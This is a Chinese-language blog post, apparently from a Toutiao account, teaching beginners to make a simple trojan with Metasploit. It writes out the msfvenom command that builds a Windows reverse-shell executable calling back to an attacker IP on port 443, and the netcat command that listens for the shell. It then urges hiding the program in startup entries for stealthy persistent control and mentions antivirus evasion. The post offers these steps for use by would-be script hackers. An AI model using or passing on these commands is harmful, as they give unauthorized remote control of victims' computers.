海陽頂端2018-03-05 12:02:52

木馬這種高大上的駭客軟體，似乎一直專屬於程式設計師和駭客的電腦玩具。普通人要想製作自己的木馬，以前要不就是要自學程式設計，學習一下tcp之類的各種協議程式設計，要不就是用別人寫的木馬生成器工具來生成。自從H。D。 Moore這個駭客在2003年釋出了Metasploit，計算機安全狀況被永久性地改變了，駭客的定義也變化了。一夜之間，任何人都可以成為駭客了，人人都可以製作自己需要的木馬了。當然用Metasploit來生成的Meterpreter這個兼木馬和滲透功能一體的後門是功能最強大的，定製化也是最高的，但寫在回答裡就太長了，所以我在這裡教大家用Metasploit生成一款簡單的反彈木馬，以此做個示例就可以了。

Metasploit的windows版下載地址在https：//windows。metasploit。com/，這裡是最新版。我比較習慣用帶有Metasploit的pentestbox，下載地址在http：//www。pentestbox。org/。

一、生成一個反彈到你本機IP的exe

命令列下本機執行ipconfig，得自己本機的ip為192。168。1。100

pentestbox介面下執行：

msfvenom -p windows/shell_reverse_tcp LHOST=192。168。1。100 LPORT=443 -f exe -o d：/443。exe

其中192。168。1。100是你本機ip，443埠和443。exe你可以換成別的埠和別的名字。

二、本機nc工具監聽443埠，另一臺和你同網段的虛擬機器執行443。exe，木馬上線

命令為nc -vvlp 443，和上文生成的木馬443。exe的埠相對應。

另一臺虛擬機器執行443。exe，nc介面就有反應了，就會得到另一臺機器的反彈shell（看下圖，我是在本機執行了下，得到了本機的反彈shell）。

當然，這個443。exe還稱之不為木馬，只能算是一個簡單的反彈程式，不過已經具備了木馬的雛形。只要你能讓443。exe做到更隱蔽和持久化控制，像加入啟動項不被人發現，就算是一個完整的木馬了。

三、附加問題

也許有的你會問，你是在內網裡測試的木馬呀，我去公網的話，你這個443。exe還能使用嗎？你的443。exe免殺嗎？你的443。exe支援64位機器嗎？我的臨聽機器也在內網裡，怎麼辦？這些都不是問題的，都可以的，我在頭條上有篇詳細的文章解答了這些問題，地址在https：//www。toutiao。com/i6514056053976465927/，題目是《駭客頭條字典，在公網環境下用虛擬機器測試木馬，以及如何防禦？》。

如果你真的想自己從頭做款木馬，那你還是學習程式設計吧；如果你想快餐化地學習駭客知識，短時間內成為一個指令碼駭客，關注我的頭條號是一個不錯的選擇，有了一定基礎再慢慢深入學習網路安全吧。